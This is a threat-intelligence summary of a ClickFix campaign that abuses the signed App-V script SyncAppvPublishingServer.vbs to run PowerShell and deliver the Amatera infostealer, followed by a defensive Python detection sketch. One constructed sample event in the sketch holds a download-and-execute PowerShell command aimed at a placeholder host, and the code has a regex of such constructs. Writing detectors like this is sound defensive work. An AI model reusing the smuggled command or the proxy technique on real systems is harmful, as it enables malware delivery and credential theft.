A new campaign combines the ClickFix social-engineering method, a fake CAPTCHA prompt, and a signed Microsoft App-V script that proxies PowerShell execution to deliver the Amatera infostealer. The attack relies on commands the victim pastes into the Windows Run dialog, configuration hosted in a public Google Calendar, LSB steganography in PNGs served from public CDNs, and in-memory PowerShell stages that load shellcode while stalling indefinitely in analysis environments. #Amatera #ClickFix
Key points
- Attackers abuse the signed SyncAppvPublishingServer.vbs App-V script and wscript.exe to proxy PowerShell through a trusted Microsoft component.
- The infection starts with a fake CAPTCHA that tricks users into pasting a command in the Windows Run dialog (ClickFix).
- The loader verifies manual execution and clipboard integrity, and uses infinite waits to evade sandbox analysis.
- Configuration is fetched from a public Google Calendar, and payloads are hidden in PNGs using LSB steganography and retrieved via WinINet APIs.
- Amatera is deployed in-memory from decrypted PowerShell and shellcode, then connects to hardcoded IPs to fetch further payloads and steal credentials.
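The first three key points describe a detectable chain: a script host (wscript.exe/cscript.exe) runs the signed SyncAppvPublishingServer.vbs with PowerShell code smuggled into its argument, and the parent is an interactive shell because the user typed the command into the Run dialog. The following Python is an added detection sketch, not code from the article or from any vendor; it runs over constructed Sysmon-style process-creation events (the field names `parent`, `image`, `cmdline` and the sample command lines are assumptions for illustration, and the URL is a placeholder). It separates the script path from the attacker-controlled argument and only raises an alert when PowerShell constructs appear in that argument, so a plain App-V sync invocation by the App-V client itself is not flagged.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation events for illustration only;
# none of these are real telemetry from the campaign described above.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # benign: an ordinary interactive PowerShell session
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NoProfile",
    },
    {   # suspicious: Run dialog (explorer.exe parent) -> wscript.exe -> App-V script,
        # with PowerShell in the script argument, as in the ClickFix chain
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\wscript.exe",
        "cmdline": (
            r"wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "
            "\"n; iex (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/p.png')\""
        ),
    },
    {   # expected-benign: the App-V client running the same script with a plain argument
        "parent": r"C:\Program Files\Microsoft Application Virtualization\Client\AppVClient.exe",
        "image": r"C:\Windows\System32\cscript.exe",
        "cmdline": r'cscript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" "n"',
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
APPV_SCRIPT = "syncappvpublishingserver.vbs"
# Parents that indicate a human-typed command (Run dialog or a shell) rather than a service.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}

# PowerShell constructs that a legitimate App-V publishing-sync argument never needs.
PS_INDICATORS = re.compile(
    r"(;|\biex\b|invoke-expression|downloadstring|downloadfile|frombase64string|"
    r"new-object|invoke-webrequest|\biwr\b|-enc\b|-encodedcommand|net\.webclient|"
    r"https?://)",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event: Dict[str, str]) -> Dict[str, object]:
    """Describe how closely one process-creation event matches the App-V proxy pattern."""
    result: Dict[str, object] = {
        "appv_script": False,        # script host executing SyncAppvPublishingServer.vbs
        "ps_indicators": [],         # PowerShell constructs found in the script argument
        "interactive_parent": False, # launched from explorer.exe / a shell (ClickFix-style)
    }
    if _basename(event["image"]) not in SCRIPT_HOSTS:
        return result
    cmd = event["cmdline"]
    idx = cmd.lower().find(APPV_SCRIPT)
    if idx < 0:
        return result
    result["appv_script"] = True
    # Only the text after the script path is the caller-controlled argument;
    # scanning the whole command line would match the script's own path.
    tail = cmd[idx + len(APPV_SCRIPT):]
    result["ps_indicators"] = sorted({m.group(0).lower() for m in PS_INDICATORS.finditer(tail)})
    result["interactive_parent"] = _basename(event["parent"]) in INTERACTIVE_PARENTS
    return result


def scan(events: List[Dict[str, str]]) -> List[int]:
    """Indices of events that warrant an alert: the App-V script with PowerShell in its argument."""
    return [
        i for i, ev in enumerate(events)
        if (r := classify_event(ev))["appv_script"] and r["ps_indicators"]
    ]


if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        r = classify_event(SAMPLE_EVENTS[i])
        print(f"event {i}: App-V script proxying PowerShell; indicators={r['ps_indicators']}; "
              f"interactive parent={r['interactive_parent']}")
```

The `interactive_parent` flag is reported rather than required so the rule still fires when the chain is launched from a scheduled task or another non-shell parent; in a real deployment the argument patterns should be tuned against the environment's own baseline of App-V client activity.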